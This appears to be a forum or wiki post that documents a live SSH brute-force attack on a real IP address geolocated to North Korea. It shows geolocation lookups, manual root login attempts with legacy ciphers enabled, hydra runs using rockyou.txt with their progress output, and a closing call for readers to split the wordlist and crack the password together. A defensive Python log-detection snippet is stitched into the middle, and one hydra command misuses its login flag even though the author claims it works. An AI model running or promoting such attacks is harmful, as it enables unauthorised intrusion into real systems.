It is recommended to read the previous nmap wiki first to understand this better.

hydra@kp:~$ mmdblookup --file Descargas/maxmind/GeoLite2-City.mmdb --ip 175.45.178.129

{
    "continent":
      {
        "code":
          "AS" <utf8_string>
        "geoname_id":
          6255147 <uint32>
        "names":
          {
            "de":
              "Asien" <utf8_string>
            "en":
              "Asia" <utf8_string>
            "es":
              "Asia" <utf8_string>
            "fr":
              "Asie" <utf8_string>
            "ja":
              "アジア" <utf8_string>
            "pt-BR":
              "Ásia" <utf8_string>
            "ru":
              "Азия" <utf8_string>
            "zh-CN":
              "亚洲" <utf8_string>
          }
      }
    "country":
      {
        "geoname_id":
          1873107 <uint32>
        "iso_code":
          "KP" <utf8_string>
        "names":
          {
            "de":
              "Nordkorea" <utf8_string>
            "en":
              "North Korea" <utf8_string>
            "es":
              "Corea del Norte" <utf8_string>
            "fr":
              "Corée du Nord" <utf8_string>
            "ja":
              "韓国、朝鮮民主主義人民共和国" <utf8_string>
            "pt-BR":
              "Coreia do Norte" <utf8_string>
            "ru":
              "КНДР" <utf8_string>
            "zh-CN":
              "朝鲜" <utf8_string>
          }
      }
    "location":
      {
        "accuracy_radius":
          50 <uint16>
        "latitude":
          40.000000 <double>
        "longitude":
          127.000000 <double>
        "time_zone":
          "Asia/Pyongyang" <utf8_string>
      }
    "registered_country":
      {
        "geoname_id":
          1873107 <uint32>
        "iso_code":
          "KP" <utf8_string>
        "names":
          {
            "de":
              "Nordkorea" <utf8_string>
            "en":
              "North Korea" <utf8_string>
            "es":
              "Corea del Norte" <utf8_string>
            "fr":
              "Corée du Nord" <utf8_string>
            "ja":
              "韓国、朝鮮民主主義人民共和国" <utf8_string>
            "pt-BR":
              "Coreia do Norte" <utf8_string>
            "ru":
              "КНДР" <utf8_string>
            "zh-CN":
              "朝鲜" <utf8_string>
          }
      }
  }

hydra@kp:~$ mmdblookup --file Descargas/maxmind/GeoLite2-City.mmdb --ip 175.45.178.129 | grep -oE '[0-9]{1,3}\.[0-9]{6}'
40.000000
127.000000

The physical host is located 2.15 km from the nearest road.

hydra@kp:~$ ssh root@175.45.178.129
Unable to negotiate with 175.45.178.129 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
hydra@kp:~$

To be able to establish the connection we must explicitly enable a legacy algorithm.

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc root@175.45.178.129

(root@175.45.178.129) Password:
(root@175.45.178.129) Password:
(root@175.45.178.129) Password:
root@175.45.178.129's password:
Connection closed by 175.45.178.129 port 22

As we can see, it does not require an authentication key so that only a recognised client can connect, so anyone can mount a brute-force attack. It allows a maximum of 4 attempts and then closes the connection, which is the typical, normal behaviour, but as we will see later hydra gets around this.

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc corea@175.45.178.129
(corea@175.45.178.129) Password:
(corea@175.45.178.129) Password:

A "corea" user as well?

We press Ctrl+C.

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc kp@175.45.178.129
(kp@175.45.178.129) Password:

kp?
We press Ctrl+C.

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc nhzx@175.45.178.129

(nhzx@175.45.178.129) Password:

We can see that the server asks for a password even when the user name does not exist (as in every GNU/Linux distribution); this makes the brute-force attack harder because we cannot deduce which user exists. One option is to use rockyou.txt for the login as well as for the password, but since having a root user is the norm we won't complicate things.

In hydra it is not necessary to specify any algorithm to establish the connection.

We download rockyou.txt with wget https://github.com/brannondorsey/naive-h...ockyou.txt

hydra -l root -P Descargas/rockyou.txt ssh:175.45.178.129
Hydra v9.2 © 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 17:06:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://175.45.178.129:22/
[STATUS] 449.00 tries/min, 449 tries in 00:01h, 14343982 to do in 532:27h, 16 active

[STATUS] 214.67 tries/min, 644 tries in 00:03h, 14343787 to do in 1113:39h, 16 active
[STATUS] 196.57 tries/min, 1376 tries in 00:07h, 14343055 to do in 1216:07h, 16 active
[STATUS] 204.33 tries/min, 3065 tries in 00:15h, 14341366 to do in 1169:47h, 16 active
[STATUS] 227.48 tries/min, 7052 tries in 00:31h, 14337379 to do in 1050:26h, 16 active
[STATUS] 216.09 tries/min, 10156 tries in 00:47h, 14334275 to do in 1105:37h, 16 active

The same, but also using rockyou.txt as the dictionary for the login.

hydra@kp:~$ hydra -l Descargas/rockyou.txt -P Descargas/rockyou.txt ssh:175.45.178.129
Hydra v9.2 © 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 18:54:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://175.45.178.129:22/
[STATUS] 569.00 tries/min, 569 tries in 00:01h, 14343862 to do in 420:09h, 16 active
[STATUS] 394.00 tries/min, 1182 tries in 00:03h, 14343249 to do in 606:45h, 16 active

As we can see it works, and it gets around the 4-attempt limit we hit when trying to log in manually.
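The server-side view of the point made above (the 4-attempt limit is enforced per connection, so a tool that simply reconnects is never stopped by it): an added example, not from the original post, that parses constructed sshd log lines and counts failed password attempts per source address across connections. The log lines, addresses, PIDs and threshold are all constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines: each connection (one sshd PID) reaches MaxAuthTries,
# sshd drops it, and the next connection starts at once. No single connection
# ever exceeds the limit, yet the source keeps guessing.
SAMPLE_LOG = """\
Dec 16 17:06:40 kp sshd[4101]: Failed password for root from 203.0.113.7 port 51002 ssh2
Dec 16 17:06:41 kp sshd[4101]: Failed password for root from 203.0.113.7 port 51002 ssh2
Dec 16 17:06:42 kp sshd[4101]: Failed password for root from 203.0.113.7 port 51002 ssh2
Dec 16 17:06:42 kp sshd[4101]: Disconnecting authenticating user root 203.0.113.7 port 51002: Too many authentication failures [preauth]
Dec 16 17:06:43 kp sshd[4105]: Failed password for root from 203.0.113.7 port 51010 ssh2
Dec 16 17:06:44 kp sshd[4105]: Failed password for root from 203.0.113.7 port 51010 ssh2
Dec 16 17:06:45 kp sshd[4105]: Failed password for invalid user corea from 203.0.113.7 port 51010 ssh2
Dec 16 17:06:45 kp sshd[4105]: Disconnecting invalid user corea 203.0.113.7 port 51010: Too many authentication failures [preauth]
Dec 16 17:09:01 kp sshd[4120]: Failed password for admin from 198.51.100.22 port 40000 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[(?P<pid>\d+)\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_failures(log_text, year=2024):
    """Yield (timestamp, pid, user, ip) for every failed password attempt."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["pid"], m["user"], m["ip"]

def brute_force_sources(log_text, threshold=5, window=timedelta(minutes=10)):
    """Return {ip: (failures, connections, users)} for sources with >= threshold failures in any window."""
    by_ip = defaultdict(list)
    for ts, pid, user, ip in parse_failures(log_text):
        by_ip[ip].append((ts, pid, user))
    flagged = {}
    for ip, evs in by_ip.items():
        times = sorted(ts for ts, _, _ in evs)
        # Sliding window over timestamps, regardless of which connection they came from
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = (len(evs), len({p for _, p, _ in evs}),
                               sorted({u for _, _, u in evs}))
                break
    return flagged
```

Counting per source rather than per connection is what makes the pattern visible; a per-connection cap such as MaxAuthTries only slows each individual connection down.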

It would be faster, more efficient and more interesting to join forces by splitting the rockyou.txt file into several parts so that between all of us we could get the password and the user.